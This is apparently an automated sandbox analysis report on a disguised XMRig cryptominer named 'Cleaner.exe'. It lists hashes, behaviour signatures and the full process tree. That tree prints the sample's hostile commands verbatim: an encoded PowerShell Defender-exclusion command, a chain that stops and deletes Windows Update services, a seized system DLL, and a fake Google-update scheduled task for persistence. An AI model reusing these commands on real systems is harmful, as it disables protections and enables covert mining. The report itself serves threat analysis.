Analysis
-
max time kernel
151s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
06-05-2022 09:42
General
-
Target
Cleaner.exe
-
Size
2.5MB
-
MD5
dbd1ed5d49db4a7042a7972e31e062bc
-
SHA1
f792cf6a1ed7f4ed8eebce2c09416f9d8764fe30
-
SHA256
f691787d560b58a0b92c6aa24732112cf0a8f57dd813aa1f3101d0fa73925be6
-
SHA512
6e72f161108640fbe9ef312131f6ca443c78167b5db39e34f63c89bc77771205f8c25f145684db38c36569de9b1f524ab69c1161636d0bbd6cc098e2c4a35cb8
Score
10/10
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
XMRig Miner Payload 5 IoCs
-
Executes dropped EXE 1 IoCs
-
Possible privilege escalation attempt 4 IoCs
-
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Modifies file permissions 1 TTPs 4 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in System32 directory 3 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Drops file in Program Files directory 3 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 55 IoCs
-
Modifies registry key 1 TTPs 18 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 23 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Cleaner.exe"C:\Users\Admin\AppData\Local\Temp\Cleaner.exe"1⤵
- Checks computer location settings
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHQAdgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG8AYQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAYgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB4AGgAIwA+AA=="2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAHQAdgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG8AYQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAYgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB4AGgAIwA+AA=="3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc3⤵
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc3⤵
-
C:\Windows\system32\sc.exesc stop wuauserv3⤵
-
C:\Windows\system32\sc.exesc stop bits3⤵
-
C:\Windows\system32\sc.exesc stop dosvc3⤵
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f3⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f3⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f3⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '^"C:\Program Files\Windows\Chrome\updater.exe^"'2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '"C:\Program Files\Windows\Chrome\updater.exe"'3⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"2⤵
-
C:\Windows\system32\schtasks.exeschtasks /run /tn "GoogleUpdateTaskMachineQC"3⤵
-
C:\Program Files\Windows\Chrome\updater.exe"C:\Program Files\Windows\Chrome\updater.exe"1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHQAdgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG8AYQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAYgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB4AGgAIwA+AA=="2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAHQAdgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG8AYQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAYgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB4AGgAIwA+AA=="3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE2⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc3⤵
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc3⤵
-
C:\Windows\system32\sc.exesc stop wuauserv3⤵
-
C:\Windows\system32\sc.exesc stop bits3⤵
-
C:\Windows\system32\sc.exesc stop dosvc3⤵
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f3⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f3⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "bxdoetcpshjfuf"3⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe ipwwwbzjbtvl0 Xji3FXYfqqI2timPThbgZueMNpSES88mLhMz2ywydJRha9S4YJkR8/KlqFio/vzAY7y//ZROYnArPXLiffwPB3Z0FRZu0jBByBu61ctc+oB1na2mPvSctdAZCvNSYjqxuJ9+jZO2dBGcTtltqRtfB5sis29FE8AguH8o6CZd6bm8mas+6c1fRdZPMGtCQH2foW0NS1AUT64wsPENhqV4uTo0H/V5F/ASYeMREvsY+0umqotx4ONlP8ddGQYatgAh6kK7OYcy646QnMfXYGVEjpW+rm4KbLNA0oQR2zL3uL73HuGKdXDaM+ZOVVhwrvHxPnKpXibEYXHzBnCVZQwdhVpfWnLbs/zpsVDxKUAqx2AYAKpSwmRaoN7exiSoSwjAMUFErD4i3EvVdzd42cGRPBLuP3cJA8nDTXB7SV4ArJ7DBza4VntXzsWBd6f5UJM2sV72i2/4PMabZk06BK764bA8NFT6PPwvonyyfWrLK/h9MPtBLjR4r9InJFrl+aIU0vaHtF5KlffAHx7zzO89LuQ7qoo+VAz2AYWXRKicHiTNI9eIJ43i4JzuvrxcpN9aN0p7L6b6CwRGtnOoOcIkeTBIR9gNQRxGa1PokHJa0uFlz1sPqCPJ7ZwjnOLC+l4MAmzMNN7nHGfmv+43lgAe66mEibuHRgn/byQM3aub6rWVhs3I0zo+uZl7tiiX2bo2D0L1ocES7XvKByIzK7hF3VP54li9B+b6r8JWY5Y/Ywmpmu44q4pNkIhUv658nxZetBNU/Rz8ETwJbvX4OmVqMkT7eXoNtIE4AHv9ysX/6NSaKnx0bZOxSdwvNwNkVseq/IXEEInY0TSjB+5Mhc/qCFtZ7DjO7FD6+RT9QjWoqKRjFQBusBa2T4hS3OqNFbbhkl4dy54I6qQj+WGzE0SdAKYAg8U7a659fcRzKv0HQxTjL5yDCgAGS9O9GhhYfEkEosOBCyaAI57IqENOeZzgIfDs4fmfxjzgEEcvuNSEd3ijh2izg0zLuoOBkko0Dhv9uSD16XFU9LV+iPYWc5HxPTLHJuc9Art+qBlWOVrMohoXn4h2Y/h4lPOjIVpRX0p8J9quZyqwqSE6rrb0n/p8DpTig8Qq72EkFOJclvRm5xsAMLS2XukLqnkhAsnjmrg+/KRHUfwfyrJjC3DImT7au05eMOA/UexcdajdgiMzQViTljMKaZl/sb2KKzf0ynfPk5ZBW/SZhLWVrJKA4QxsvgFY8y1t3VPOC853hTpMN1IwGMh/4YYUzBkGPEk3nbDrqHoEoh/J+JC3Et4H6kZFKsTwTx1qEd3AC3uLGoeXeUWVDoa8oKXKoRq0UqV8I2Lncic5A4p4TTCK+CT9fEpli+4ADKRSNwFnCnH9Pxctof7tqJHDlJJAJmmM6sicPU5OUxYh5XhZ5NWKxAx1fS+i9kzy/HyZ5bIi8OTg2kYvT+fBPa3tlKvWKL0+Zx2NHePChjIX0kYyuflXPMH2dIEC+5KW1KDcHJwoYEQ6V7UH6LWGJYk6LKR7T6rN+hYyp8z3ly13GhAUIMT4HNg4Lc/fZg==2⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Windows\Chrome\updater.exeFilesize
2.5MB
MD5dbd1ed5d49db4a7042a7972e31e062bc
SHA1f792cf6a1ed7f4ed8eebce2c09416f9d8764fe30
SHA256f691787d560b58a0b92c6aa24732112cf0a8f57dd813aa1f3101d0fa73925be6
SHA5126e72f161108640fbe9ef312131f6ca443c78167b5db39e34f63c89bc77771205f8c25f145684db38c36569de9b1f524ab69c1161636d0bbd6cc098e2c4a35cb8
-
C:\Program Files\Windows\Chrome\updater.exeFilesize
2.5MB
MD5dbd1ed5d49db4a7042a7972e31e062bc
SHA1f792cf6a1ed7f4ed8eebce2c09416f9d8764fe30
SHA256f691787d560b58a0b92c6aa24732112cf0a8f57dd813aa1f3101d0fa73925be6
SHA5126e72f161108640fbe9ef312131f6ca443c78167b5db39e34f63c89bc77771205f8c25f145684db38c36569de9b1f524ab69c1161636d0bbd6cc098e2c4a35cb8
-
memory/264-143-0x0000000000000000-mapping.dmp
-
memory/348-142-0x0000000000000000-mapping.dmp
-
memory/368-137-0x0000000000000000-mapping.dmp
-
memory/536-174-0x00007FFCE36D0000-0x00007FFCE4191000-memory.dmpFilesize
10.8MB
-
memory/536-176-0x000001DBD7010000-0x000001DBD701A000-memory.dmpFilesize
40KB
-
memory/536-175-0x000001DBD7230000-0x000001DBD724C000-memory.dmpFilesize
112KB
-
memory/536-177-0x000001DBD7470000-0x000001DBD748C000-memory.dmpFilesize
112KB
-
memory/536-178-0x000001DBD7020000-0x000001DBD702A000-memory.dmpFilesize
40KB
-
memory/536-179-0x000001DBD7490000-0x000001DBD74AA000-memory.dmpFilesize
104KB
-
memory/536-182-0x000001DBD74B0000-0x000001DBD74BA000-memory.dmpFilesize
40KB
-
memory/536-172-0x0000000000000000-mapping.dmp
-
memory/536-180-0x000001DBD7450000-0x000001DBD7458000-memory.dmpFilesize
32KB
-
memory/536-181-0x000001DBD7460000-0x000001DBD7466000-memory.dmpFilesize
24KB
-
memory/684-195-0x0000000000000000-mapping.dmp
-
memory/808-184-0x0000000000000000-mapping.dmp
-
memory/920-165-0x0000000000000000-mapping.dmp
-
memory/932-190-0x0000000000400000-0x000000000040C000-memory.dmpFilesize
48KB
-
memory/932-193-0x0000000000400000-0x000000000040C000-memory.dmpFilesize
48KB
-
memory/932-191-0x0000000000401BEA-mapping.dmp
-
memory/976-164-0x0000000000000000-mapping.dmp
-
memory/988-157-0x0000000000000000-mapping.dmp
-
memory/1048-151-0x0000000000000000-mapping.dmp
-
memory/1056-208-0x0000000000000000-mapping.dmp
-
memory/1148-218-0x0000000001A50000-0x0000000001A70000-memory.dmpFilesize
128KB
-
memory/1148-213-0x000000014036DB84-mapping.dmp
-
memory/1148-214-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/1148-216-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/1148-212-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/1148-220-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/1148-221-0x0000000001B10000-0x0000000001B30000-memory.dmpFilesize
128KB
-
memory/1200-156-0x0000000000000000-mapping.dmp
-
memory/1308-158-0x0000000000000000-mapping.dmp
-
memory/1360-209-0x0000000000000000-mapping.dmp
-
memory/1460-152-0x0000000000000000-mapping.dmp
-
memory/1524-168-0x0000000000000000-mapping.dmp
-
memory/1708-147-0x0000000000000000-mapping.dmp
-
memory/1716-161-0x0000000000000000-mapping.dmp
-
memory/1988-138-0x0000000000000000-mapping.dmp
-
memory/2020-219-0x0000000000000000-mapping.dmp
-
memory/2032-189-0x0000000000000000-mapping.dmp
-
memory/2336-196-0x0000000000000000-mapping.dmp
-
memory/2400-167-0x0000000000000000-mapping.dmp
-
memory/2424-202-0x0000000000000000-mapping.dmp
-
memory/2460-206-0x0000000000000000-mapping.dmp
-
memory/2480-146-0x0000000000000000-mapping.dmp
-
memory/2544-144-0x0000000000000000-mapping.dmp
-
memory/2624-160-0x0000000000000000-mapping.dmp
-
memory/2752-162-0x0000000000000000-mapping.dmp
-
memory/2800-163-0x0000000000000000-mapping.dmp
-
memory/3068-185-0x0000000000000000-mapping.dmp
-
memory/3152-171-0x0000000000000000-mapping.dmp
-
memory/3164-139-0x0000000000000000-mapping.dmp
-
memory/3388-159-0x0000000000000000-mapping.dmp
-
memory/3424-187-0x0000000000000000-mapping.dmp
-
memory/3504-148-0x0000000000000000-mapping.dmp
-
memory/3536-186-0x0000000000000000-mapping.dmp
-
memory/3544-217-0x00007FFCE36D0000-0x00007FFCE4191000-memory.dmpFilesize
10.8MB
-
memory/3544-215-0x000001FE361C0000-0x000001FE361C7000-memory.dmpFilesize
28KB
-
memory/3556-141-0x0000000000000000-mapping.dmp
-
memory/3632-166-0x0000000000000000-mapping.dmp
-
memory/3712-188-0x0000000000000000-mapping.dmp
-
memory/3824-131-0x0000000000000000-mapping.dmp
-
memory/4016-173-0x00007FFCE36D0000-0x00007FFCE4191000-memory.dmpFilesize
10.8MB
-
memory/4016-201-0x000000001B5C0000-0x000000001B5D2000-memory.dmpFilesize
72KB
-
memory/4052-207-0x0000000000000000-mapping.dmp
-
memory/4248-200-0x0000000000000000-mapping.dmp
-
memory/4264-205-0x0000000000000000-mapping.dmp
-
memory/4300-154-0x0000000000000000-mapping.dmp
-
memory/4380-150-0x0000000000000000-mapping.dmp
-
memory/4392-140-0x0000000000000000-mapping.dmp
-
memory/4400-211-0x0000000000000000-mapping.dmp
-
memory/4456-199-0x0000000000000000-mapping.dmp
-
memory/4472-204-0x0000000000000000-mapping.dmp
-
memory/4496-136-0x0000000000000000-mapping.dmp
-
memory/4520-203-0x0000000000000000-mapping.dmp
-
memory/4560-135-0x00007FFCE36D0000-0x00007FFCE4191000-memory.dmpFilesize
10.8MB
-
memory/4560-133-0x000001AA83F50000-0x000001AA83F72000-memory.dmpFilesize
136KB
-
memory/4560-132-0x0000000000000000-mapping.dmp
-
memory/4576-145-0x0000000000000000-mapping.dmp
-
memory/4596-198-0x0000000000000000-mapping.dmp
-
memory/4628-155-0x0000000000000000-mapping.dmp
-
memory/4700-194-0x0000000000000000-mapping.dmp
-
memory/4812-134-0x00007FFCE36D0000-0x00007FFCE4191000-memory.dmpFilesize
10.8MB
-
memory/4812-130-0x0000000000BE0000-0x0000000000E66000-memory.dmpFilesize
2.5MB
-
memory/4820-197-0x0000000000000000-mapping.dmp
-
memory/4912-149-0x0000000000000000-mapping.dmp
-
memory/4952-183-0x0000000000000000-mapping.dmp
-
memory/5064-210-0x0000000000000000-mapping.dmp
-
memory/5116-153-0x0000000000000000-mapping.dmp